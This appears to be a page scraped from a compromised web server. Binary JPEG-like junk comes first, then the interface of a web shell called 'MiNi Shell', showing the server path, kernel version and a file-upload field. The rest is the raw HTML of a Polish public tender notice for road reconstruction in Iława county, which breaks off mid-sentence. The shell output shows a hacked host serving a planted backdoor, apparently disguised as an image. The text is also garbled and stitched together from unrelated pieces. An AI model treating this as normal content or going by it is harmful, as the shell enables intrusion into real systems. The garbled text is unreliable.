JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220411/0011714001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dróg powiatowych na terenie powiatu iławskiego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT IŁAWSKI - POWIATOWY ZARZĄD DRÓG W IŁAWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510854569</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 33A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@powiat-ilawski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">powiat-ilawski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dróg powiatowych na terenie powiatu iławskiego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9eec4fd2-b972-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00117140</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023203/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa drogi powiatowej nr 1297N Różanki – Gałdowo – Gulb w msc. Mozgowo</p> <p class="mb-0">1.1.3 Przebudowa drogi powiatowej nr 1339N Frednowy – Franciszkowo-Dziarny (dr. woj. 536)</p> <p class="mb-0">1.1.4 Przebudowa drogi powiatowej nr 1269N gr. woj., (Trumieje) – Biskupiczki w msc. Butowo</p> <p class="mb-0">1.1.5 Przebudowa drogi powiatowej nr 1214N Kałduny – Rożental – Wałdyki w msc. Rożental</p> <p class="mb-0">1.1.14 Przebudowa drogi powiatowej Nr 1200N gr. wojew. (Kołodzieje)-Bałoszyce-Babięty Wlk.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zd_ilawa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zd_ilawa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z § 3 ust. 3 RPRM w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zam. Pub. oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz. 1320; dalej: “Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer PC lub MAC: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, system operacyjny - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0, włączona obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 2.Wyk.a, przystępując do niniejszego postępowania o udzielenie zam. Pub.o: akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej oraz uznaje go za wiążący, zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej https://platformazakupowa.pl/pn/zd_ilawa. 3.Zalecenia: Formaty plików wykorzystywanych przez wyk powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia RM w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz min wymagań dla systemów teleinformatycznych”. Zam. rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip .7Z Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dok. złożone w takich plikach zostaną uznane za złożone nieskutecznie. Zam. zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB. Ze względu na niskie ryzyko naruszenia integralności pliku oraz weryfikację podpisu, zam. zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Zam. zaleca, aby Wyk. z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email. Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji. Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert/wniosków. Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1. Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. Zam. rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu. Zam. zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DT3A.260.9.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie 1: <br/>„Przebudowa drogi powiatowej Nr 1297N Różanki – Gałdowo – Gulb w msc. Mózgowo” <br/>Szerokość 5,00 mb, długość 561,00 mb<br/>Inwestycja znajduje msc. Mózgowo gmina Iława, powiat iławski, województwo warmińsko-mazurskie. Inwestycja ta obsługuje teren zabudowy mieszkaniowej, gospodarstwa rolne. Istniejący teren leży w terenie zabudowy. Długość inwestycji wynosi 561,00 m. Obecnie droga posiada nawierzchnię asfaltową, która jest w złym stanie technicznym. Szerokość istniejącej drogi asfaltowej wynosi średnio 4,80-5,20 m. Droga posiada odwodnienie poprzez spadki podłużne i poprzeczne. Wzdłuż jezdni po lewej stronie istniejący chodnik z kostki betonowej. Ruch pojazdów na drodze jest średni, przeważają pojazdy osobowe, pojazdy dostawcze i ciężarowe. Istniejący teren nie leży w strefie ochrony środowiska, ochrony konserwatorskiej, oddziaływania górniczego. Trasa jezdni w planie jak i w przekroju podłużnym została dostosowana do istniejącego odcinka, oraz konfiguracji terenu. Oś projektowanej jezdni dopasowano do istniejącego stanu technicznego. Cały odcinek jezdni zakłada nawiązanie niwelety względem istniejącej nawierzchni z drobnymi korektami, wraz z frezowaniem istniejącej nawierzchni śr. 4 cm. Na całym odcinku jezdni zachowano istniejący układ szerokości jezdni śr. 5,00 m. Nawierzchnię jezdni zaprojektowano jako nawierzchnię z betonu asfaltowego, w-wa ścieralna gr. 3 cm, na warstwie wiążąco/profilującej z betonu asfaltowego gr. 4 cm, na istniejącej nawierzchni. Istniejąca droga będzie obramowana od lewej strony istniejącymi krawężnikami (do pozostawienia), natomiast od prawej strony zaprojektowano pobocze z frezowiny gr. 12-15 cm, szerokość 1,00 m. W miejscach gdzie droga wymaga poszerzenia dodatkowo oprócz dwóch nowych warstw betonu asfaltowego przewidziano dodatkową warstwę z betonu asfaltowego gr. 4 cm, na podbudowie z kruszywa stabilizowanego mechanicznie gr. 24 cm, na warstwie z mieszanki związanej cementem C3/4 gr. 15 cm. Przekrój poprzeczny jezdni zaprojektowano jako daszkowy 2%. W ciągu drogi znajduje się istniejący chodnik z kostki betonowej, który należy pozostawić w obecnym stanie. Zjazdy na posesję po lewej stronie wykonane są z kostki betonowej, należy je wyregulować do nowej nawierzchni, natomiast istniejące zjazdy gruntowe z prawej strony należy wyregulować kruszywem 0/31,5 mm gr. 12 cm , wymiar 2x6 m, a zjazdy asfaltowe z prawej strony należy wyregulować betonem asfaltowym w-wa ścieralna gr. 3 cm, w-wa profilująca gr. 4 cm. Odwodnienie inwestycji poprzez spadki podłużne i poprzeczne do istniejącego systemu odwodnienia. Należy wykończyć istniejącą krawędź jezdni wzdłuż istniejących cieków w poprzek chodnika, na dł. 3m, poprzez ułożenie cieku z kostki betonowej gr. 6 cm, na betonie C 8 / 10 gr. 20 cm. Szerokość cieku 20 cm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy wyznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie 2: <br/>„Przebudowa drogi powiatowej Nr 1214N Kałduny – Rożental – Wałdyki w msc. Rożental”<br/> Szerokość 5,00 mb, długość 347,00 mb<br/>Inwestycja znajduje się na terenie msc. Rożental gmina Lubawa, powiat iławski, województwo warmińsko-mazurskie. Inwestycja ta obsługiwać będzie teren zabudowy mieszkaniowej, gospodarstwa rolne. Istniejący teren leży w terenie zabudowy. Długość inwestycji wynosi 347,00 m. Obecnie droga posiada nawierzchnię asfaltową, która jest w złym stanie technicznym. Szerokość istniejącej drogi asfaltowej wynosi średnio 3,50-5,00 m. Droga posiada odwodnienie poprzez spadki podłużne i poprzeczne. Ruch pieszy, samochodowy odbywa się po istniejących nawierzchniach. Wzdłuż jezdni po lewej stronie istniejący chodnik o nawierzchni betonowej. Ruch pojazdów na drodze jest średni, przeważają pojazdy osobowe, pojazdy dostawcze i ciężarowe. Istniejący teren nie leży w strefie ochrony środowiska, ochrony konserwatorskiej, oddziaływania górniczego. Na całym odcinku jezdni zachowano istniejący układ szerokości jezdni śr. 5,00 m. Nawierzchnię jezdni zaprojektowano jako nawierzchnię z betonu asfaltowego, w-wa ścieralna gr. 4 cm, na warstwie wiążąco/profilującej z betonu asfaltowego gr. 4 cm, na istniejącej nawierzchni. Istniejąca droga będzie obramowana poboczami gruntowymi umocnionymi kruszywem 0/31,5 mm, zamiennie krawężnikiem betonowym najazdowym 15x22 cm, usytuowanie zgodnie z PZT. W miejscach gdzie droga wymaga poszerzenia, bądź naprawy przełomów dodatkowo oprócz dwóch nowych warstw betonu asfaltowego przewidziano dodatkową warstwę z betonu asfaltowego gr. 4 cm, na podbudowie z kruszywa stabilizowanego mechanicznie gr. 24 cm, na warstwie z mieszanki związanej cementem C3/4 gr. 15 cm. Przekrój poprzeczny jezdni zaprojektowano jako daszkowy 2%. W ciągu drogi znajdują się istniejące chodniki, zjazdy na posesję o nawierzchni betonowej, które należy rozebrać. Nowa nawierzchnia chodnika to kostka betonowa gr 8 cm (20% kolor), natomiast nowa nawierzchnia dla zjazdu na posesję to kostka betonowa gr. 8 cm (100% kolor). Projektowaną nawierzchnię należy ułożyć na podsypce cementowo piaskowej 1:4 gr. 4 cm, na podbudowie z mieszanki związanej cementem C8/10, w-wie odsączającej z piasku gr. 20 cm. Obramowanie nawierzchni od strony jezdni krawężnikiem najazdowym 15x22 cm, natomiast od strony posesji obrzeżem betonowym 8x30 cm. Należy wykonać płynne przejście z chodnika na zjazd – nie stosować obrzeży. Należy dokonać regulacji istniejących nawierzchni, dodatkowo należy wykonać regulację kruszywem 0/31,5 mm, ilości podano w przedmiarze robót. Pobocza gruntowe umocnione kruszywem 0/31,5 mm gr. 15 cm, szerokości 1,00 m. Odwodnienie inwestycji poprzez spadki podłużne i poprzeczne do istniejącego systemu odwodnienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-07</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy wyznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Przebudowa drogi powiatowej Nr 1339N Frednowy – Franciszkowo – Dziarny (dr. woj. nr 536)”<br/>Szerokość 4,50-5,00 mb, długość 888,00 mb<br/>Przedmiotowe przedsięwzięcie zlokalizowane jest w powiecie iławskim, na terenie gm. Iława w miejscowości Frednowy. Przebudowę nawierzchni jezdni drogi powiatowej nr 1339N relacji Frednowy – Franciszkowo – Mątyki – Dziarny ( dr. woj. nr 536 ) zaplanowano na dwóch odcinkach o łącznej dł. 888,00 mb. Na projektowanym odcinku km 0+000 – 0+495 droga o długości 495,00 mb posiada nawierzchnię z mieszanki mineralno - asfaltowej. Szerokość jezdni wynosi 4,50 m. Pobocza gruntowe o szerokości 0,50 – 0,75 m. Po prawej i lewej stronie jezdni zarośnięte i nieregularne rowy. Nawierzchnia jezdni na całym odcinku jest spękana z licznymi wysadzinami. W poboczu po obu stronach jezdni znajdują się ubytki gruntu wymyte przez spływające wody opadowe przy krawędzi jezdni. W km 0+314 istniejący przepust betonowy. Na drugim projektowanym odcinku drogi km 1+377 - 1+770 droga o długości 393,00 mb posiada nawierzchnię z mieszanki mineralno - asfaltowej. Szerokość jezdni wynosi 5,00 m. Pobocza gruntowe o szerokości 0,50 – 0,75 m. Po prawej i lewej stronie jezdni nieregularne rowy. Nawierzchnia jezdni na całym odcinku jest spękana z licznymi wysadzinami. W poboczu po obu stronach jezdni znajdują się ubytki gruntu wymyte przez spływające wody opadowe przy krawędzi jezdni. W km 1+424 istniejący przepust betonowy ograniczony po obu stronach drogi studniami. <br/>W ramach planowanego zadnia przewiduje się przebudowę dwóch odcinków jezdni drogi powiatowej nr 1339N. Na pierwszym odcinku od km 0+000 do km 0+495 przebudowana zostanie istniejąca nawierzchnia bitumiczna jezdni wraz ze zjazdami publicznymi i indywidualnymi do posesji i na pola. Jezdnia zostanie poszerzona do 5,00 m. Poszerzenie o 0,5 m zaprojektowano przy prawej krawędzi jezdni. Zaprojektowano odprowadzenie wód opadowych z jezdni powierzchniowo na przyległy teren pasa drogowego i do istniejących rowów drogowych, które w trakcie inwestycji zostaną oczyszczone i wyprofilowane zapewniając sprawne odprowadzenie wód opadowych poza korpus drogi. Warstwy konstrukcyjne poszerzenia jezdni wykonane zostaną z warstwy odsączającej z pisaku o gr. 20 cm, podbudowy zasadniczej z kruszywa 0/31,5mm łamanego o grubości 25 cm, warstwy wiążącej z mieszanki mineralno – asfaltowej AC16W gr. 5 cm. Po wykonaniu warstwy wiążącej połączenia nowej i starej nawierzchni zostanie wzmocnione siatką do zbrojenia. Siatkę należy ułożyć na całej szerokości jezdni. Pobocza po obu stronach jezdni zostaną uzupełnione kruszywem 0/31,5 mm łamanym o grubości 15 cm. Szerokość pobocza 0,75 